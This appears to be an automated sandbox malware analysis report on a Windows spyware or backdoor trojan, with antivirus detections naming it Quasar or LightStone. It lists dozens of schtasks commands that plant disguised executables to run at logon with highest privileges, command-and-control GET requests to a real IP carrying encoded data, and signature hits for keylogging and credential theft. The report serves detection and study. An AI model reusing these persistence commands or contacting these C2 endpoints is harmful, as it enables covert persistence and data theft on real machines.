Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Aug. 2, 2021, 5:51 p.m. | Aug. 2, 2021, 5:53 p.m. |
-
fontWinRuntimecrtNetrefruntimedll.exe "C:\Users\test22\AppData\Local\Temp\fontWinRuntimecrtNetrefruntimedll.exe"
2388-
schtasks.exe "schtasks" /create /tn "fontWinRuntimecrtNetrefruntimedll" /sc ONLOGON /tr "'C:\Users\test22\AppData\Local\Temp\UserInfoSetup(2018040515215734C)\fontWinRuntimecrtNetrefruntimedll.exe'" /rl HIGHEST /f
2760 -
schtasks.exe "schtasks" /create /tn "wininit" /sc ONLOGON /tr "'C:\Windows\System32\C_20932\wininit.exe'" /rl HIGHEST /f
1420 -
schtasks.exe "schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\Cursors\WmiPrvSE.exe'" /rl HIGHEST /f
2576 -
schtasks.exe "schtasks" /create /tn "audiodg" /sc ONLOGON /tr "'C:\Documents and Settings\audiodg.exe'" /rl HIGHEST /f
2200 -
schtasks.exe "schtasks" /create /tn "srvany" /sc ONLOGON /tr "'C:\Windows\SysWOW64\wscript\srvany.exe'" /rl HIGHEST /f
2332 -
fontWinRuntimecrtNetrefruntimedll.exe "C:\Users\test22\AppData\Local\Temp\fontWinRuntimecrtNetrefruntimedll.exe"
2888-
schtasks.exe "schtasks" /create /tn "SearchIndexer" /sc ONLOGON /tr "'C:\Windows\System32\ntshrui\SearchIndexer.exe'" /rl HIGHEST /f
240 -
schtasks.exe "schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90120000-0114-0412-0000-0000000FF1CE}-C\Office.en-us\pw.exe'" /rl HIGHEST /f
2064 -
schtasks.exe "schtasks" /create /tn "smss" /sc ONLOGON /tr "'C:\ProgramData\Templates\smss.exe'" /rl HIGHEST /f
1032 -
schtasks.exe "schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\PerfLogs\Admin\WmiPrvSE.exe'" /rl HIGHEST /f
1232 -
schtasks.exe "schtasks" /create /tn "taskhost" /sc ONLOGON /tr "'C:\Windows\System32\C_500\taskhost.exe'" /rl HIGHEST /f
1896 -
schtasks.exe "schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\System32\wbem\WMIPICMP\WmiPrvSE.exe'" /rl HIGHEST /f
2608 -
schtasks.exe "schtasks" /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\winlogon.exe'" /rl HIGHEST /f
916 -
schtasks.exe "schtasks" /create /tn "explorer" /sc ONLOGON /tr "'C:\util\ProcessMonitor\explorer.exe'" /rl HIGHEST /f
2092 -
-
chcp.com chcp 65001
2316 -
PING.EXE ping -n 5 localhost
2520 -
WmiPrvSE.exe "C:\PerfLogs\Admin\WmiPrvSE.exe"
2680
-
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
ipinfo.io | 34.117.59.81 | |
api.telegram.org | 149.154.167.220 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.101:49223 -> 34.117.59.81:443 | 2025331 | ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) | Device Retrieving External IP Address Detected |
TCP 192.168.56.101:49223 -> 34.117.59.81:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.101:49224 -> 34.117.59.81:443 | 2025331 | ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) | Device Retrieving External IP Address Detected |
TCP 192.168.56.101:49224 -> 34.117.59.81:443 | 906200022 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 34.117.59.81:443 -> 192.168.56.101:49224 | 2025330 | ET POLICY Possible External IP Lookup SSL Cert Observed (ipinfo.io) | Device Retrieving External IP Address Detected |
TCP 34.117.59.81:443 -> 192.168.56.101:49223 | 2025330 | ET POLICY Possible External IP Lookup SSL Cert Observed (ipinfo.io) | Device Retrieving External IP Address Detected |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49223 34.117.59.81:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1D4 | CN=ipinfo.io | 2a:93:c5:f6:21:4b:14:40:41:d9:36:fe:ff:fe:65:37:17:1c:4e:b8 |
TLS 1.2 192.168.56.101:49224 34.117.59.81:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1D4 | CN=ipinfo.io | 2a:93:c5:f6:21:4b:14:40:41:d9:36:fe:ff:fe:65:37:17:1c:4e:b8 |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
suspicious_features | Connection to IP address | suspicious_request | GET http://78.24.217.56/on/predpochel/ostatsa/anonistom/CpuGameApiSqlflower.php?KmCgE=RmlX1zOMlkMdAM5jwvjI&9cb2beefe30f08fd6b229bb65bdf14a5=cbe8ead4e58ebaeb2d1f8262e2b19694&847db2de527380cc6f80ef60ca65913d=wY3AzM2ITM5YWNmljN3UDO4YDN5gjYjljMhZTO3M2YmZTOilTY2cjN&KmCgE=RmlX1zOMlkMdAM5jwvjI | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://78.24.217.56/on/predpochel/ostatsa/anonistom/CpuGameApiSqlflower.php?KmCgE=RmlX1zOMlkMdAM5jwvjI&6620ba511bddaf7cd97a91f748a57ce0=wM0cTN2UjMmZjN4MDOjlTYkdTM0MGM1UTMjdTMyMmZhNzMyEWZwETOyUzM5MjNyUjMyYDNyYTO&847db2de527380cc6f80ef60ca65913d=ANxYmZ0ETN3QzNhZ2MzQWZkRjM2UGOzU2N5I2YyEDZmNjZ0YjZ1kDZ&3766d7ec164999b3250f09ca6d7b986c=d1nIyYGN5EDN1MGNkdjZ1QmZyYjZ3QmZzITYxUzY1MDN0cDM2QWM1gDO4IiOiIWNxUGO4EDNjhzN3ADMwYDMmhjN3EzMmVDM0cDZlFWOiwiI0AzMmVGMwQzYwEmM5QWN3MWO4QGNkJGZ5QzMzQTMwM2YlBDN0MTM2IiOiADZlNGO2czY0QzMyUGZlBzM4ETOmlTYjVzMmFGNjJWMis3W | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://78.24.217.56/on/predpochel/ostatsa/anonistom/CpuGameApiSqlflower.php?KmCgE=RmlX1zOMlkMdAM5jwvjI&6620ba511bddaf7cd97a91f748a57ce0=wM0cTN2UjMmZjN4MDOjlTYkdTM0MGM1UTMjdTMyMmZhNzMyEWZwETOyUzM5MjNyUjMyYDNyYTO&847db2de527380cc6f80ef60ca65913d=ANxYmZ0ETN3QzNhZ2MzQWZkRjM2UGOzU2N5I2YyEDZmNjZ0YjZ1kDZ&3766d7ec164999b3250f09ca6d7b986c=d1nIjFGNihzNmRzYzQjY4YTYwIzN1UDNwIWZlJ2MkVjNzUWZ3QTZ3QzMmJiOiIWNxUGO4EDNjhzN3ADMwYDMmhjN3EzMmVDM0cDZlFWOiwiI0AzMmVGMwQzYwEmM5QWN3MWO4QGNkJGZ5QzMzQTMwM2YlBDN0MTM2IiOiADZlNGO2czY0QzMyUGZlBzM4ETOmlTYjVzMmFGNjJWMis3W&ffd8a3463ee88805d4304008f2eca47a=QX9JiI6IyM3kTYmBTNjJTO5kjMyMjYmVWY2QDO4EmN5MGO2MWN1ICLiMWY0IGO3YGNjNDNihjNhBjM3UTN0AjYlVmYzQWN2MTZldDNldDNzYmI6IiY1ETZ4gTM0MGO3cDMwAjNwYGO2cTMzYWNwQzNkVWY5ICLiQDMzYWZwADNjBTYykDZ1czY5gDZ0QmYklDNzMDNxAzYjVGM0QzMxYjI6ICMkV2Y4YzNjRDNzITZkVGMzgTM5YWOhNWNzYWY0MmYxIyes0nIw4WS5ZlMahWNXllTCNlYop0MaZnSIVVavpWSzkzRaVHbyYVVOVVUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplUV5sWUp9maJhkRFZVa3lWSwwWbRdWUq50Z0AzUnd3VZVXOXFmeOhlWtlTbjFlQ550ZNNDZ2JVbiBHZslkNJl2YspFbiBHZsl0cw4WSvJFWkhGZtJGcONzYwFjMMZHbtxkda1mYwJEWhZHOp9keChEZwgWbJZTSTpFdSdVWspkbJNXSDJWM5clWUlzUZBnTYFVavpWSsVjMiZjVXJGcS5WSzlUaORTR610dJl2Tpd3VZBjTzI2dKNETpBjMipmVHJGbSZUSoZVbjZHdFlkMZpnTw0kVRl2bqlkbKNjYpdXaJBzZ65UN0kmT5VERMdXWq5UM0knT6lUaPlWTyI2cKNETplUMTl2bqlUNKhEZ1Z1MipmSDxUa3dFZ2ZlMVl2bqlUd5cVYuZVbjl2dpl0cWNjYs5EbJZTSTVGMsJTWpdXaJdXVU1UdRpXT4RzQPdXSqxUMjRVTp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS5lERkpnVHRWavpWSsFzVZ9kSYpleWxWSzlUeRFVMp1UeRFTVGJFbJZTSTpFdG1GVEJEbJNXSD1Ee0kXT1FlaJZTSpNGbax2YsplbjxmTsl0cJlWZJRWRNRDNp10ZBVUSWJUMRdWQE1EMnRFTxs2RJBHMFZ1bV12Y25URJBXSGt0cWdEZ1x2aJZTSTpFdG1GVWJUMRl2dpl0dTl1NSlHN2ATYKdzZwwEb0pGcuJna3QXcENVUIplRJF0ULdzYHp1Np9maJxWMXl1TWZUVIp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMzN5EmZwUzYykTO5IjMzImZlFmN0gDOhZTOjhjNjVTNiwiI3ATY2IjZkZjY2MWYzM2N2YDZzkDM2ImMmFWNhF2MhVWM2MmZyIzYhJiOiIWNxUGO4EDNjhzN3ADMwYDMmhjN3EzMmVDM0cDZlFWOiwiI0AzMmVGMwQzYwEmM5QWN3MWO4QGNkJGZ5QzMzQTMwM2YlBDN0MTM2IiOiADZlNGO2czY0QzMyUGZlBzM4ETOmlTYjVzMmFGNjJWMis3W | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://ipinfo.io/json |
request | GET http://78.24.217.56/on/predpochel/ostatsa/anonistom/CpuGameApiSqlflower.php?KmCgE=RmlX1zOMlkMdAM5jwvjI&9cb2beefe30f08fd6b229bb65bdf14a5=cbe8ead4e58ebaeb2d1f8262e2b19694&847db2de527380cc6f80ef60ca65913d=wY3AzM2ITM5YWNmljN3UDO4YDN5gjYjljMhZTO3M2YmZTOilTY2cjN&KmCgE=RmlX1zOMlkMdAM5jwvjI |
request | GET http://78.24.217.56/on/predpochel/ostatsa/anonistom/CpuGameApiSqlflower.php?KmCgE=RmlX1zOMlkMdAM5jwvjI&6620ba511bddaf7cd97a91f748a57ce0=wM0cTN2UjMmZjN4MDOjlTYkdTM0MGM1UTMjdTMyMmZhNzMyEWZwETOyUzM5MjNyUjMyYDNyYTO&847db2de527380cc6f80ef60ca65913d=ANxYmZ0ETN3QzNhZ2MzQWZkRjM2UGOzU2N5I2YyEDZmNjZ0YjZ1kDZ&3766d7ec164999b3250f09ca6d7b986c=d1nIyYGN5EDN1MGNkdjZ1QmZyYjZ3QmZzITYxUzY1MDN0cDM2QWM1gDO4IiOiIWNxUGO4EDNjhzN3ADMwYDMmhjN3EzMmVDM0cDZlFWOiwiI0AzMmVGMwQzYwEmM5QWN3MWO4QGNkJGZ5QzMzQTMwM2YlBDN0MTM2IiOiADZlNGO2czY0QzMyUGZlBzM4ETOmlTYjVzMmFGNjJWMis3W |
request | GET http://78.24.217.56/on/predpochel/ostatsa/anonistom/CpuGameApiSqlflower.php?KmCgE=RmlX1zOMlkMdAM5jwvjI&6620ba511bddaf7cd97a91f748a57ce0=wM0cTN2UjMmZjN4MDOjlTYkdTM0MGM1UTMjdTMyMmZhNzMyEWZwETOyUzM5MjNyUjMyYDNyYTO&847db2de527380cc6f80ef60ca65913d=ANxYmZ0ETN3QzNhZ2MzQWZkRjM2UGOzU2N5I2YyEDZmNjZ0YjZ1kDZ&3766d7ec164999b3250f09ca6d7b986c=d1nIjFGNihzNmRzYzQjY4YTYwIzN1UDNwIWZlJ2MkVjNzUWZ3QTZ3QzMmJiOiIWNxUGO4EDNjhzN3ADMwYDMmhjN3EzMmVDM0cDZlFWOiwiI0AzMmVGMwQzYwEmM5QWN3MWO4QGNkJGZ5QzMzQTMwM2YlBDN0MTM2IiOiADZlNGO2czY0QzMyUGZlBzM4ETOmlTYjVzMmFGNjJWMis3W&ffd8a3463ee88805d4304008f2eca47a=QX9JiI6IyM3kTYmBTNjJTO5kjMyMjYmVWY2QDO4EmN5MGO2MWN1ICLiMWY0IGO3YGNjNDNihjNhBjM3UTN0AjYlVmYzQWN2MTZldDNldDNzYmI6IiY1ETZ4gTM0MGO3cDMwAjNwYGO2cTMzYWNwQzNkVWY5ICLiQDMzYWZwADNjBTYykDZ1czY5gDZ0QmYklDNzMDNxAzYjVGM0QzMxYjI6ICMkV2Y4YzNjRDNzITZkVGMzgTM5YWOhNWNzYWY0MmYxIyes0nIw4WS5ZlMahWNXllTCNlYop0MaZnSIVVavpWSzkzRaVHbyYVVOVVUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplUV5sWUp9maJhkRFZVa3lWSwwWbRdWUq50Z0AzUnd3VZVXOXFmeOhlWtlTbjFlQ550ZNNDZ2JVbiBHZslkNJl2YspFbiBHZsl0cw4WSvJFWkhGZtJGcONzYwFjMMZHbtxkda1mYwJEWhZHOp9keChEZwgWbJZTSTpFdSdVWspkbJNXSDJWM5clWUlzUZBnTYFVavpWSsVjMiZjVXJGcS5WSzlUaORTR610dJl2Tpd3VZBjTzI2dKNETpBjMipmVHJGbSZUSoZVbjZHdFlkMZpnTw0kVRl2bqlkbKNjYpdXaJBzZ65UN0kmT5VERMdXWq5UM0knT6lUaPlWTyI2cKNETplUMTl2bqlUNKhEZ1Z1MipmSDxUa3dFZ2ZlMVl2bqlUd5cVYuZVbjl2dpl0cWNjYs5EbJZTSTVGMsJTWpdXaJdXVU1UdRpXT4RzQPdXSqxUMjRVTp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS5lERkpnVHRWavpWSsFzVZ9kSYpleWxWSzlUeRFVMp1UeRFTVGJFbJZTSTpFdG1GVEJEbJNXSD1Ee0kXT1FlaJZTSpNGbax2YsplbjxmTsl0cJlWZJRWRNRDNp10ZBVUSWJUMRdWQE1EMnRFTxs2RJBHMFZ1bV12Y25URJBXSGt0cWdEZ1x2aJZTSTpFdG1GVWJUMRl2dpl0dTl1NSlHN2ATYKdzZwwEb0pGcuJna3QXcENVUIplRJF0ULdzYHp1Np9maJxWMXl1TWZUVIp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMzN5EmZwUzYykTO5IjMzImZlFmN0gDOhZTOjhjNjVTNiwiI3ATY2IjZkZjY2MWYzM2N2YDZzkDM2ImMmFWNhF2MhVWM2MmZyIzYhJiOiIWNxUGO4EDNjhzN3ADMwYDMmhjN3EzMmVDM0cDZlFWOiwiI0AzMmVGMwQzYwEmM5QWN3MWO4QGNkJGZ5QzMzQTMwM2YlBDN0MTM2IiOiADZlNGO2czY0QzMyUGZlBzM4ETOmlTYjVzMmFGNjJWMis3W |
request | GET https://ipinfo.io/json |
domain | ipinfo.io |
file | C:\Users\test22\AppData\Local\Temp\E9yULbl2mt.bat |
cmdline | "schtasks" /create /tn "audiodg" /sc ONLOGON /tr "'C:\Documents and Settings\audiodg.exe'" /rl HIGHEST /f |
cmdline | "schtasks" /create /tn "fontWinRuntimecrtNetrefruntimedll" /sc ONLOGON /tr "'C:\Users\test22\AppData\Local\Temp\UserInfoSetup(2018040515215734C)\fontWinRuntimecrtNetrefruntimedll.exe'" /rl HIGHEST /f |
cmdline | "schtasks" /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\winlogon.exe'" /rl HIGHEST /f |
cmdline | "C:\Windows\System32\cmd.exe" /C "C:\Users\test22\AppData\Local\Temp\E9yULbl2mt.bat" |
cmdline | "schtasks" /create /tn "smss" /sc ONLOGON /tr "'C:\ProgramData\Templates\smss.exe'" /rl HIGHEST /f |
cmdline | "schtasks" /create /tn "taskhost" /sc ONLOGON /tr "'C:\Windows\System32\C_500\taskhost.exe'" /rl HIGHEST /f |
cmdline | "schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\Cursors\WmiPrvSE.exe'" /rl HIGHEST /f |
cmdline | "schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90120000-0114-0412-0000-0000000FF1CE}-C\Office.en-us\pw.exe'" /rl HIGHEST /f |
cmdline | "schtasks" /create /tn "explorer" /sc ONLOGON /tr "'C:\util\ProcessMonitor\explorer.exe'" /rl HIGHEST /f |
cmdline | "schtasks" /create /tn "SearchIndexer" /sc ONLOGON /tr "'C:\Windows\System32\ntshrui\SearchIndexer.exe'" /rl HIGHEST /f |
cmdline | "schtasks" /create /tn "wininit" /sc ONLOGON /tr "'C:\Windows\System32\C_20932\wininit.exe'" /rl HIGHEST /f |
cmdline | "schtasks" /create /tn "srvany" /sc ONLOGON /tr "'C:\Windows\SysWOW64\wscript\srvany.exe'" /rl HIGHEST /f |
cmdline | "schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\PerfLogs\Admin\WmiPrvSE.exe'" /rl HIGHEST /f |
cmdline | "schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\System32\wbem\WMIPICMP\WmiPrvSE.exe'" /rl HIGHEST /f |
file | C:\Users\test22\AppData\Local\Temp\E9yULbl2mt.bat |
description | Communication using DGA | rule | Network_DGA | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Create a windows service | rule | Create_Service | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | Communications over P2P network | rule | Network_P2P_Win | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | (no description) | rule | Check_Dlls | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Affect hook table | rule | win_hook |
cmdline | ping -n 5 localhost |
cmdline | chcp 65001 |
cmdline | "schtasks" /create /tn "audiodg" /sc ONLOGON /tr "'C:\Documents and Settings\audiodg.exe'" /rl HIGHEST /f |
cmdline | "schtasks" /create /tn "fontWinRuntimecrtNetrefruntimedll" /sc ONLOGON /tr "'C:\Users\test22\AppData\Local\Temp\UserInfoSetup(2018040515215734C)\fontWinRuntimecrtNetrefruntimedll.exe'" /rl HIGHEST /f |
cmdline | "schtasks" /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\winlogon.exe'" /rl HIGHEST /f |
cmdline | "schtasks" /create /tn "smss" /sc ONLOGON /tr "'C:\ProgramData\Templates\smss.exe'" /rl HIGHEST /f |
cmdline | "schtasks" /create /tn "taskhost" /sc ONLOGON /tr "'C:\Windows\System32\C_500\taskhost.exe'" /rl HIGHEST /f |
cmdline | "schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\Cursors\WmiPrvSE.exe'" /rl HIGHEST /f |
cmdline | "schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90120000-0114-0412-0000-0000000FF1CE}-C\Office.en-us\pw.exe'" /rl HIGHEST /f |
cmdline | "schtasks" /create /tn "explorer" /sc ONLOGON /tr "'C:\util\ProcessMonitor\explorer.exe'" /rl HIGHEST /f |
cmdline | "schtasks" /create /tn "SearchIndexer" /sc ONLOGON /tr "'C:\Windows\System32\ntshrui\SearchIndexer.exe'" /rl HIGHEST /f |
cmdline | "schtasks" /create /tn "wininit" /sc ONLOGON /tr "'C:\Windows\System32\C_20932\wininit.exe'" /rl HIGHEST /f |
cmdline | "schtasks" /create /tn "srvany" /sc ONLOGON /tr "'C:\Windows\SysWOW64\wscript\srvany.exe'" /rl HIGHEST /f |
cmdline | "schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\PerfLogs\Admin\WmiPrvSE.exe'" /rl HIGHEST /f |
cmdline | "schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\System32\wbem\WMIPICMP\WmiPrvSE.exe'" /rl HIGHEST /f |
host | 78.24.217.56 |
cmdline | "schtasks" /create /tn "audiodg" /sc ONLOGON /tr "'C:\Documents and Settings\audiodg.exe'" /rl HIGHEST /f |
cmdline | "schtasks" /create /tn "fontWinRuntimecrtNetrefruntimedll" /sc ONLOGON /tr "'C:\Users\test22\AppData\Local\Temp\UserInfoSetup(2018040515215734C)\fontWinRuntimecrtNetrefruntimedll.exe'" /rl HIGHEST /f |
cmdline | "schtasks" /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\winlogon.exe'" /rl HIGHEST /f |
cmdline | "schtasks" /create /tn "smss" /sc ONLOGON /tr "'C:\ProgramData\Templates\smss.exe'" /rl HIGHEST /f |
cmdline | "schtasks" /create /tn "taskhost" /sc ONLOGON /tr "'C:\Windows\System32\C_500\taskhost.exe'" /rl HIGHEST /f |
cmdline | "schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\Cursors\WmiPrvSE.exe'" /rl HIGHEST /f |
cmdline | "schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90120000-0114-0412-0000-0000000FF1CE}-C\Office.en-us\pw.exe'" /rl HIGHEST /f |
cmdline | "schtasks" /create /tn "explorer" /sc ONLOGON /tr "'C:\util\ProcessMonitor\explorer.exe'" /rl HIGHEST /f |
cmdline | "schtasks" /create /tn "SearchIndexer" /sc ONLOGON /tr "'C:\Windows\System32\ntshrui\SearchIndexer.exe'" /rl HIGHEST /f |
cmdline | "schtasks" /create /tn "wininit" /sc ONLOGON /tr "'C:\Windows\System32\C_20932\wininit.exe'" /rl HIGHEST /f |
cmdline | "schtasks" /create /tn "srvany" /sc ONLOGON /tr "'C:\Windows\SysWOW64\wscript\srvany.exe'" /rl HIGHEST /f |
cmdline | "schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\PerfLogs\Admin\WmiPrvSE.exe'" /rl HIGHEST /f |
cmdline | "schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\System32\wbem\WMIPICMP\WmiPrvSE.exe'" /rl HIGHEST /f |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob |
file | C:\ProgramData\Templates\smss.exe:Zone.Identifier |
file | C:\Windows\System32\ntshrui\SearchIndexer.exe:Zone.Identifier |
file | C:\PerfLogs\Admin\WmiPrvSE.exe:Zone.Identifier |
file | C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\winlogon.exe:Zone.Identifier |
file | C:\Windows\System32\C_500\taskhost.exe:Zone.Identifier |
file | C:\MSOCache\All Users\{90120000-0114-0412-0000-0000000FF1CE}-C\Office.en-us\pw.exe:Zone.Identifier |
file | C:\util\ProcessMonitor\explorer.exe:Zone.Identifier |
file | C:\Windows\System32\wbem\WMIPICMP\WmiPrvSE.exe:Zone.Identifier |
file | C:\Windows\System32\C_20932\wininit.exe:Zone.Identifier |
file | C:\Users\test22\AppData\Local\Temp\UserInfoSetup(2018040515215734C)\fontWinRuntimecrtNetrefruntimedll.exe:Zone.Identifier |
file | C:\Documents and Settings\audiodg.exe:Zone.Identifier |
file | C:\Windows\Cursors\WmiPrvSE.exe:Zone.Identifier |
file | C:\Windows\SysWOW64\wscript\srvany.exe:Zone.Identifier |
Lionic | Trojan.MSIL.LightStone.m!c |
Elastic | malicious (high confidence) |
DrWeb | BackDoor.QuasarNET.3 |
MicroWorld-eScan | Trojan.MSIL.Basic.8.Gen |
FireEye | Generic.mg.2ee557a2195e4106 |
CAT-QuickHeal | Trojan.YakbeexMSIL.ZZ4 |
McAfee | GenericRXPF-LQ!2EE557A2195E |
Malwarebytes | Trojan.PasswordStealer |
Sangfor | Trojan.Win32.Save.a |
K7AntiVirus | Spyware ( 004bf6371 ) |
Alibaba | Backdoor:Win32/LightStone.c7ded26e |
K7GW | Spyware ( 004bf6371 ) |
Cybereason | malicious.2195e4 |
BitDefenderTheta | Gen:NN.ZemsilF.34050.Lm0@au8YJ6ji |
Cyren | W32/MSIL_Troj.BGI.gen!Eldorado |
Symantec | ML.Attribute.HighConfidence |
ESET-NOD32 | a variant of MSIL/Spy.Agent.AES |
APEX | Malicious |
Paloalto | generic.ml |
ClamAV | Win.Packed.Uztuby-9853721-0 |
Kaspersky | HEUR:Backdoor.MSIL.LightStone.gen |
BitDefender | Trojan.MSIL.Basic.8.Gen |
Avast | Win32:KeyloggerX-gen [Trj] |
Ad-Aware | Trojan.MSIL.Basic.8.Gen |
Emsisoft | Trojan.MSIL.Basic.8.Gen (B) |
TrendMicro | TROJ_GEN.R06CC0DGR21 |
McAfee-GW-Edition | GenericRXPF-LQ!2EE557A2195E |
Sophos | Mal/SpyNoon-A |
SentinelOne | Static AI - Malicious PE |
Jiangmin | Backdoor.MSIL.eunv |
MaxSecure | Trojan.Malware.74703599.susgen |
Avira | TR/Spy.Agent.tcyin |
MAX | malware (ai score=83) |
Microsoft | Trojan:Win32/Spy.BYF!MTB |
Gridinsoft | Spy.Win32.Agent.dd!n |
Arcabit | Trojan.MSIL.Basic.8.Gen |
GData | Trojan.MSIL.Basic.8.Gen |
Cynet | Malicious (score: 100) |
AhnLab-V3 | Trojan/Win.Spy.C4556236 |
VBA32 | TScope.Trojan.MSIL |
ALYac | Trojan.MSIL.Basic.8.Gen |
Cylance | Unsafe |
TrendMicro-HouseCall | TROJ_GEN.R06CC0DGR21 |
Ikarus | Win32.Outbreak |
eGambit | Unsafe.AI_Score_94% |
Fortinet | MSIL/Agent.BYF!tr.spy |
AVG | Win32:KeyloggerX-gen [Trj] |
Panda | Trj/GdSda.A |
CrowdStrike | win/malicious_confidence_100% (W) |
Qihoo-360 | Win32/Backdoor.LightStone.HwMA3wcA |